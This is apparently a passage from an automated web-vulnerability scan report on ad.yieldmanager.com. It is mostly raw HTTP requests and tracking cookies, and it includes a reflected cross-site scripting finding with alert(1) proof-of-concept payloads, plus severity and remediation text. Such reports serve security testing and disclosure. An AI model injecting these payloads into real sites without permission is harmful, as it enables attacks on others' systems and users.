WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:49:23 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 23 Jul 2011 13:49:23 GMT
Pragma: no-cache
Content-Length: 4721
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
<a href="http://ad.yieldmanager.com/imageclick?Z=728x90&b090d"><script>alert(1)</script>b3e751e2978=1&s=806254&_salt=2506030954&t=2" target="_parent">
...[SNIP]...

3.33. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8994d"-alert(1)-"ce7be5c493 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=728x90&section=806254&8994d"-alert(1)-"ce7be5c493=1 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wj]!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*<57!!!#G!$1dF!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=*/]]!!!#G!#dUS!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!$,m-!,x.^!%)<k!2l9<!%vD]!!mT+!!5/$*ERU>!w1K*!(#l)!%C9A!(3/Z~~~~~=)nIg=*/Bb!!!#G!#avR!,x.^!%)<k!/pW_!%M#r!#a.3!!5/$*ERU>!w1K*!(#l)!%C9A!'UVr~~~~~=)nJc=*!G4!!!#G!$0Tm!,x.^!%)<k!30M5!%vao!(-EV!?5%!*ERU=!w1K*!(#l)!%JKf!(3U?~~~~~=)nNM=.*8W!!.vL!$.w1!,x.^!%)<k!2jZq!%v%0!4)>p!!H<'*ERU?!w1K*!(#l)!%C9A!(2_Z~~~~~=)n`L=*/XG!!!#G!$,b^!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=)nl!!!.vL!$1dE!,x.^!%)<k!3/P1!'#WQ!7rn@!?5%!*ERU=!w1K*!(#l)!%C9A!(9^Z~~~~~=)ndb=)no>!!.vL"; ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X